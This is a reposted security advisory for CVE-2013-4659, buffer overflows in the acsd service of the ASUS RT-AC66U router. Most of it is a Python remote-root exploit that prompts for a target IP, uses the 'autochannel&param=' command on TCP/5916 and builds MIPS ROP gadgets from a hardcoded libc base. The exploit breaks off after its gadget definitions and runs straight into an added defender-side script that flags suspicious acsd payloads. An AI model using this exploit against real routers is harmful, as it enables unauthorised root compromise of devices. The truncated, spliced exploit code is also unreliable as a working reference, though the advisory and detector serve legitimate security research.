AC66U Multiple Buffer Overflow Vulnerabilities (CVE-2013-4659)

Published: 2013-07-29
Updated: 2013-07-31

Affected systems:
Asus RT-AC66U
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61499
CVE(CAN) ID: CVE-2013-4659

The ASUS RT-AC66U is a fifth-generation dual-band Wi-Fi router and is also the launch platform for ASUS's AiCloud service.

The ASUS RT-AC66U ships the Broadcom ACSD binary, which contains multiple buffer overflow vulnerabilities; a remote attacker can exploit any one of them to execute arbitrary code with root privileges.

<*Source: Jacob Holcomb/Gimppy
  *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users act at their own risk!

#!/usr/bin/env python

import signal, struct
from time import sleep
from socket import *
from sys import exit, exc_info

#
# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
# Discovered and Reported*June 2013
# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
#                        *Security Analysts @ Independent Security Evaluators
# Software Vendor*********
# Exploit/Advisory********,
# Software****************acsd wireless service (Listens on TCP/5916)
# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable)
# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
#
# Overview:
#  The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
#  Buffer Overflow attacks.
#
#  Multiple overflows exist in the following software:
#
#  - Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands)
#


def sigHandle(signum, frm): # Signal handler
   
    print "\n[!!!] Cleaning up the exploit... [!!!]\n"
    sleep(1)
    exit(0)


def targServer():
   
    while True:   
        try:
            server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
            server = inet_ntoa(server)
            break
        except:
            print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
            sleep(1)
            continue
           
    return server 


def main():
     
    print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
[*] Discovered and Reported: June 2013
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE
[*] Software Vendor:
[*] Exploit/Advisory: ,
[*] Software: acsd wireless service (Listens on TCP/5916)
[*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)
[*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""")
    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
    victim = targServer()
    port = int(5916)
    acsdCmd = "autochannel&param=" #Vulnerable command - JH
   
    # base address of .text section of libc.so.0 in acsd's address space
    libc_base = 0x2ab25000

    # ROP gadget #1
    # lui    s0,0x2
    # li      a0,1
    # move    t9,s1
    # jalr    t9
    # ori    a1,s0,0x2
    ra1 = struct.pack("<L", libc_base + 0x2d39c)

    # ROP gadget #2
    # move    t9,s3
    # lw      ra,44(sp)
    # lw      s4,40(sp)
    # lw      s3,36(sp)
    # lw      s2,32(sp)
    # lw      s1,28(sp)
    # lw      s0,24(sp)
    # jr      t9
    s1 = struct.pack("<L", libc_base + 0x34358)

    # sleep() - used to force program context switch (cache flush)
    s3 = struct.pack("<L", libc_base + 0x2cb90)

    # ROP gadget #3
    # addiu  a1,sp,24
    # lw      gp,16(sp)
    # lw      ra,32(sp)
    # jr      ra
    # addiu  sp,sp,40
    ra2 = struct.pack("<L", libc_base + 0xa1b0)
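As an added, defender-side example (not part of the advisory or of the exploit above), the script below inspects payloads sent to the acsd service on TCP/5916 and flags the three command prefixes the advisory names when their argument is oversized or carries non-printable bytes. The 64-byte argument limit, the sample flows and the addresses in them are constructed assumptions.

```python
import string

ACSD_PORT = 5916  # the acsd wireless service port given in the advisory
# Command prefixes the advisory lists as overflow-prone in Broadcom acsd.
VULN_PREFIXES = ("autochannel&param=", "autochannel&data=", "csscan&ifname=")
MAX_ARG_LEN = 64  # assumed sane upper bound for a channel/ifname argument
PRINTABLE = set(string.printable.encode())


def inspect_acsd_payload(payload, dst_port=ACSD_PORT):
    """Return a dict explaining why a payload looks suspicious, else None."""
    if dst_port != ACSD_PORT:
        return None
    for prefix in VULN_PREFIXES:
        pb = prefix.encode()
        if not payload.startswith(pb):
            continue
        arg = payload[len(pb):]
        reasons = []
        if len(arg) > MAX_ARG_LEN:
            reasons.append("argument length %d exceeds %d" % (len(arg), MAX_ARG_LEN))
        if any(b not in PRINTABLE for b in arg):
            reasons.append("non-printable bytes in argument (possible packed addresses)")
        if reasons:
            return {"command": prefix.rstrip("="), "arg_len": len(arg), "reasons": reasons}
        return None  # known command with a sane-looking argument
    return None  # some other acsd command; not covered by this heuristic


def scan_flows(flows):
    """flows: iterable of (src_ip, dst_port, payload) tuples; returns alerts."""
    alerts = []
    for src, dport, payload in flows:
        verdict = inspect_acsd_payload(payload, dport)
        if verdict:
            verdict["src"] = src
            alerts.append(verdict)
    return alerts


# Constructed sample traffic: a benign request, an oversized request that
# also carries non-printable bytes, and an unrelated HTTP request.
SAMPLE_FLOWS = [
    ("192.0.2.10", 5916, b"autochannel&param=1"),
    ("192.0.2.77", 5916, b"autochannel&param=" + b"A" * 200 + b"\x00\x01"),
    ("192.0.2.10", 80, b"GET / HTTP/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    for a in scan_flows(SAMPLE_FLOWS):
        print("ALERT %s -> %s: %s" % (a["src"], a["command"], "; ".join(a["reasons"])))
```

Feed it payloads reassembled from a capture filtered on TCP/5916; the length threshold is an assumption, so tune it against normal acsd traffic before relying on it.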

Copyright notice: unless otherwise noted, all articles are original to this site.

Please credit the source when reposting: http://www.heiqu.com/c71bf3b260f40a1dbf3989cc681255ee.html